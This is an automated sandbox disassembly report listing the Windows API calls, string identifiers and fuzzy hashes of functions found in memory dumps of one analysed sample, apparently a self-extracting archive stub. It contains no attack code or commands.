                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                  • Instruction ID: a4a48e411135f3911cac48a24eaf0b7ff862d0e0a87d6322b80331a88577a8c4
                  • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                  • Instruction Fuzzy Hash: 0731A0B16047468FCB14DF28C85666EBFE0FB96304F10492DE499C7342C639AA4ACBA1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a794ed6e6fb667a1245a80e718f111544f2925837ac4d101f1d6319b36d9d39b
                  • Instruction ID: 1dcdb460ebfd1563927c3b4192e1808c11816f9dcc3219507c8c4eb5918acae7
                  • Opcode Fuzzy Hash: a794ed6e6fb667a1245a80e718f111544f2925837ac4d101f1d6319b36d9d39b
                  • Instruction Fuzzy Hash: B5212972A205714FCB48CF2DDCD083A7756B79A321746812BEE46CB2D1C534E92CE7A0
                  APIs
                  • _swprintf.LIBCMT ref: 0059DABE
                    • Part of subcall function 0059400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0059401D
                    • Part of subcall function 005A1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,005D0EE8,00000200,0059D202,00000000,?,00000050,005D0EE8), ref: 005A15B3
                  • _strlen.LIBCMT ref: 0059DADF
                  • SetDlgItemTextW.USER32(?,005CE154,?), ref: 0059DB3F
                  • GetWindowRect.USER32(?,?), ref: 0059DB79
                  • GetClientRect.USER32(?,?), ref: 0059DB85
                  • GetWindowLongW.USER32(?,000000F0), ref: 0059DC25
                  • GetWindowRect.USER32(?,?), ref: 0059DC52
                  • SetWindowTextW.USER32(?,?), ref: 0059DC95
                  • GetSystemMetrics.USER32(00000008), ref: 0059DC9D
                  • GetWindow.USER32(?,00000005), ref: 0059DCA8
                  • GetWindowRect.USER32(00000000,?), ref: 0059DCD5
                  • GetWindow.USER32(00000000,00000002), ref: 0059DD47
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                  • String ID: $%s:$CAPTION$T\$d
                  • API String ID: 2407758923-2742923714
                  • Opcode ID: 793c17295dbc39fc6529796369525e4f6a77aeb065de22eaff67a0ee73933616
                  • Instruction ID: 2e6a2143910ee12235f4b51ec9e9a57a9e945c18f127a48e66a7ee09439f201c
                  • Opcode Fuzzy Hash: 793c17295dbc39fc6529796369525e4f6a77aeb065de22eaff67a0ee73933616
                  • Instruction Fuzzy Hash: 7E817C72508341AFDB10DF68CD89E6BBBE9FB89704F04091DFA84D3291D674E909CB62
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 005BC277
                    • Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE2F
                    • Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE41
                    • Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE53
                    • Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE65
                    • Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE77
                    • Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE89
                    • Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE9B
                    • Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBEAD
                    • Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBEBF
                    • Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBED1
                    • Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBEE3
                    • Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBEF5
                    • Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBF07
                  • _free.LIBCMT ref: 005BC26C
                    • Part of subcall function 005B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958), ref: 005B84F4
                    • Part of subcall function 005B84DE: GetLastError.KERNEL32(005C3958,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958,005C3958), ref: 005B8506
                  • _free.LIBCMT ref: 005BC28E
                  • _free.LIBCMT ref: 005BC2A3
                  • _free.LIBCMT ref: 005BC2AE
                  • _free.LIBCMT ref: 005BC2D0
                  • _free.LIBCMT ref: 005BC2E3
                  • _free.LIBCMT ref: 005BC2F1
                  • _free.LIBCMT ref: 005BC2FC
                  • _free.LIBCMT ref: 005BC334
                  • _free.LIBCMT ref: 005BC33B
                  • _free.LIBCMT ref: 005BC358
                  • _free.LIBCMT ref: 005BC370
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID: P\
                  • API String ID: 161543041-2375622079
                  • Opcode ID: 4248b34f128f366cb38d1d2d949d44fe33090e93065389e73458f8992af43fe3
                  • Instruction ID: 48fcf6f6eaf9efbd0bf13a2259148714c2abf65ae54194b99882ae8d8cff0a53
                  • Opcode Fuzzy Hash: 4248b34f128f366cb38d1d2d949d44fe33090e93065389e73458f8992af43fe3
                  • Instruction Fuzzy Hash: 55316D316006069FEF20AA78DA4ABEABFE9FF40310F54982AE449D7551DF71BC40CB54
                  APIs
                  • GetWindow.USER32(?,00000005), ref: 005ACD51
                  • GetClassNameW.USER32(00000000,?,00000800), ref: 005ACD7D
                    • Part of subcall function 005A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0059BB05,00000000,.exe,?,?,00000800,?,?,005A85DF,?), ref: 005A17C2
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 005ACD99
                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 005ACDB0
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 005ACDC4
                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 005ACDED
                  • DeleteObject.GDI32(00000000), ref: 005ACDF4
                  • GetWindow.USER32(00000000,00000002), ref: 005ACDFD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                  • String ID: STATIC
                  • API String ID: 3820355801-1882779555
                  • Opcode ID: ad53859933429f305957c39f8a3341bfb1f453a17af2b5a9ed33d6c930c132da
                  • Instruction ID: c7bb25283abc7efe86f87909d244d8accc7a1af6c6a3082cc416e2f88dfde526
                  • Opcode Fuzzy Hash: ad53859933429f305957c39f8a3341bfb1f453a17af2b5a9ed33d6c930c132da
                  • Instruction Fuzzy Hash: 2511E4735453217BE7216B609C0EFAF3E9CFBA6741F004425FA42E9092CA688D09D6A4
                  APIs
                  • _free.LIBCMT ref: 005B8EC5
                    • Part of subcall function 005B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958), ref: 005B84F4
                    • Part of subcall function 005B84DE: GetLastError.KERNEL32(005C3958,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958,005C3958), ref: 005B8506
                  • _free.LIBCMT ref: 005B8ED1
                  • _free.LIBCMT ref: 005B8EDC
                  • _free.LIBCMT ref: 005B8EE7
                  • _free.LIBCMT ref: 005B8EF2
                  • _free.LIBCMT ref: 005B8EFD
                  • _free.LIBCMT ref: 005B8F08
                  • _free.LIBCMT ref: 005B8F13
                  • _free.LIBCMT ref: 005B8F1E
                  • _free.LIBCMT ref: 005B8F2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 9e58347356790721da788b5c02e80758b78ccef03d84017821fa4fd9e1ca6e66
                  • Instruction ID: ff092ed56b8e541bfecca43a4cd2d0c91886bc0a25952e8778538ecd75def294
                  • Opcode Fuzzy Hash: 9e58347356790721da788b5c02e80758b78ccef03d84017821fa4fd9e1ca6e66
                  • Instruction Fuzzy Hash: 5C11A27650010EAFCF11EF94CA46CEA3FA9FF44354B5190A5FA088B626DA31EE51DB80
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID:
                  • String ID: ;%u$x%u$xc%u
                  • API String ID: 0-2277559157
                  • Opcode ID: e7d3a1b511df658277c884118234bb5657343dccbf52b3d92495cb9677db2e7f
                  • Instruction ID: 36b7fc2d2ca1c1909a7b083663e2f8a7a730d3686af074c58ad1b2219e3e1d03
                  • Opcode Fuzzy Hash: e7d3a1b511df658277c884118234bb5657343dccbf52b3d92495cb9677db2e7f
                  • Instruction Fuzzy Hash: 88F1F5716042416BDF15EF78C899BEE7F99BFD1300F084969F885DF283DA649848C7A2
                  APIs
                    • Part of subcall function 0059130B: GetDlgItem.USER32(00000000,00003021), ref: 0059134F
                    • Part of subcall function 0059130B: SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365
                  • EndDialog.USER32(?,00000001), ref: 005AAD20
                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 005AAD47
                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 005AAD60
                  • SetWindowTextW.USER32(?,?), ref: 005AAD71
                  • GetDlgItem.USER32(?,00000065), ref: 005AAD7A
                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 005AAD8E
                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 005AADA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: MessageSend$Item$TextWindow$Dialog
                  • String ID: LICENSEDLG
                  • API String ID: 3214253823-2177901306
                  • Opcode ID: c6d7d200fb1c62fdca8723396c70af6896f4ee6800de3b71f756e5cd0f31167b
                  • Instruction ID: 61da513c5c385c4b0d0a36ce44780cd391ad27eb44770e09166d0a211dfe70a5
                  • Opcode Fuzzy Hash: c6d7d200fb1c62fdca8723396c70af6896f4ee6800de3b71f756e5cd0f31167b
                  • Instruction Fuzzy Hash: 3021B172244205BBD2255B75EC4EE3F3FACFB67B46F010405F284E64A0DB666909F632
                  APIs
                  • __EH_prolog.LIBCMT ref: 00599448
                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0059946B
                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0059948A
                    • Part of subcall function 005A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0059BB05,00000000,.exe,?,?,00000800,?,?,005A85DF,?), ref: 005A17C2
                  • _swprintf.LIBCMT ref: 00599526
                    • Part of subcall function 0059400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0059401D
                  • MoveFileW.KERNEL32(?,?), ref: 00599595
                  • MoveFileW.KERNEL32(?,?), ref: 005995D5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                  • String ID: rtmp%d
                  • API String ID: 2111052971-3303766350
                  • Opcode ID: 54a70fb686c745ce3873caa11de79a503df7301a1dd42da7cc29d74979ce1854
                  • Instruction ID: 77955a1adbfda80ad7e21a36a7338dc6b01edc817524154090a037890090f1ec
                  • Opcode Fuzzy Hash: 54a70fb686c745ce3873caa11de79a503df7301a1dd42da7cc29d74979ce1854
                  • Instruction Fuzzy Hash: 7441527290015A66DF20EB65CC89EEE7B7CBF55380F0044A9B549E3042EB749F89DB64
                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?), ref: 005A8F38
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 005A8F59
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 005A8F80
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Global$AllocByteCharCreateMultiStreamWide
                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                  • API String ID: 4094277203-4209811716
                  • Opcode ID: 857ca3de035703609de1ee135f3d520903f7adf0fcd9dc7d85482dbe5d668d01
                  • Instruction ID: 0beeb2c3d062e9211a7549a6c87c7711efab78abf2b7707fc75fdc96c03b3e5b
                  • Opcode Fuzzy Hash: 857ca3de035703609de1ee135f3d520903f7adf0fcd9dc7d85482dbe5d668d01
                  • Instruction Fuzzy Hash: 8D3106315083176FD724AB649C4AFBFBF68BF92760F144519F801A61C1EF64A909C3A5
                  APIs
                  • GetLastError.KERNEL32(?,005D0EE8,005B3E14,005D0EE8,?,?,005B3713,00000050,?,005D0EE8,00000200), ref: 005B8FA9
                  • _free.LIBCMT ref: 005B8FDC
                  • _free.LIBCMT ref: 005B9004
                  • SetLastError.KERNEL32(00000000,?,005D0EE8,00000200), ref: 005B9011
                  • SetLastError.KERNEL32(00000000,?,005D0EE8,00000200), ref: 005B901D
                  • _abort.LIBCMT ref: 005B9023
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID: X\
                  • API String ID: 3160817290-3186185854
                  • Opcode ID: 8a979c1b6d6a5a61d64a22d65d3d08d42096487ee88df8926b71673ef1abfb55
                  • Instruction ID: 91c716196d8c6866af25676f6dfc67a41a25bd42a07769845a61de83fd97c936
                  • Opcode Fuzzy Hash: 8a979c1b6d6a5a61d64a22d65d3d08d42096487ee88df8926b71673ef1abfb55
                  • Instruction Fuzzy Hash: 34F0D136504A12AACB2233256C0FFFB2E5EBBE1764B341014F515A2192EF20F901E114
                  APIs
                  • __aulldiv.LIBCMT ref: 005A0A9D
                    • Part of subcall function 0059ACF5: GetVersionExW.KERNEL32(?), ref: 0059AD1A
                  • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 005A0AC0
                  • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 005A0AD2
                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 005A0AE3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 005A0AF3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 005A0B03
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 005A0B3D
                  • __aullrem.LIBCMT ref: 005A0BCB
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                  • String ID:
                  • API String ID: 1247370737-0
                  • Opcode ID: 1282ace635c5f6c7e5eed97df3c11665e2ced946f12f32c9283d8f73fe7ba04b
                  • Instruction ID: 5d00c049e03a22fe55cf69ebdb6e272b7de319eba60b29b6f3a273eaf0b47048
                  • Opcode Fuzzy Hash: 1282ace635c5f6c7e5eed97df3c11665e2ced946f12f32c9283d8f73fe7ba04b
                  • Instruction Fuzzy Hash: 0F413AB240830A9FC710DF64C88496FFBF8FB88714F044A2EF59692650E735E648DB62
                  APIs
                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,005BF5A2,?,00000000,?,00000000,00000000), ref: 005BEE6F
                  • __fassign.LIBCMT ref: 005BEEEA
                  • __fassign.LIBCMT ref: 005BEF05
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 005BEF2B
                  • WriteFile.KERNEL32(?,?,00000000,005BF5A2,00000000,?,?,?,?,?,?,?,?,?,005BF5A2,?), ref: 005BEF4A
                  • WriteFile.KERNEL32(?,?,00000001,005BF5A2,00000000,?,?,?,?,?,?,?,?,?,005BF5A2,?), ref: 005BEF83
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  • Opcode ID: 4373bd50f50942f7dd4841f83a0b57b5a455ba99ef43e0dfc1d4bb0cb0de7f4a
                  • Instruction ID: e2280debb3b9dee0691864323fa839cdfaff3f77a55f2bd42d1d9eb6eb706603
                  • Opcode Fuzzy Hash: 4373bd50f50942f7dd4841f83a0b57b5a455ba99ef43e0dfc1d4bb0cb0de7f4a
                  • Instruction Fuzzy Hash: 1A519E71A006099FDB10CFA8D886AEEBBB9FF19310F28451AE555E7291E730A940CB60
                  APIs
                  • GetTempPathW.KERNEL32(00000800,?), ref: 005AC54A
                  • _swprintf.LIBCMT ref: 005AC57E
                    • Part of subcall function 0059400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0059401D
                  • SetDlgItemTextW.USER32(?,00000066,005D946A), ref: 005AC59E
                  • _wcschr.LIBVCRUNTIME ref: 005AC5D1
                  • EndDialog.USER32(?,00000001), ref: 005AC6B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                  • String ID: %s%s%u
                  • API String ID: 2892007947-1360425832
                  • Opcode ID: 0fd73ca53625bc04306fc39623ea07e8135413100f4c274d4bb3408a68a15224
                  • Instruction ID: 8e79f9d764ba1745b855e16e43bfcb4930c9f4f54bd7b1b25395eab5435eb91d
                  • Opcode Fuzzy Hash: 0fd73ca53625bc04306fc39623ea07e8135413100f4c274d4bb3408a68a15224
